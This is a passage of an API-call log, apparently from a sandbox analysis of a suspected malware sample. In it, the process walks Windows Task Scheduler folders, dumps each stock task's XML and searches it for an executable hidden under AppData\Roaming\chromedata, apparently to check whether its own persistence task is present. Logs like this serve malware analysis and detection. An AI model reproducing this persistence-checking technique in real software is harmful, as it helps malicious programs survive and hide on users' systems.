	[0073.173] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.173] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.173] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.173] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0
	[0073.173] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.175] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.176] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.176] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.176] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.176] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.176] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.176] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.176] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xb, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.176] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.177] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.177] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.177] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="Notifications") returned 0x0
	[0073.177] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.179] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.179] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.179] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.179] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.180] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.180] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.180] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.180] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xc, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.180] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.181] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.181] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.181] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="WinSAT") returned 0x0
	[0073.181] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.183] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.183] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.183] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.184] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.184] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.184] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.184] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.184] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xd, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.184] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.188] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=21) returned 0x0
	[0073.188] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.188] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="ActivateWindowsSearch") returned 0x0
	[0073.188] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.190] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.190] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.190] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.191] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="ConfigureInternetTimeService") returned 0x0
	[0073.191] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.192] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.193] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.193] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.193] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="DispatchRecoveryTasks") returned 0x0
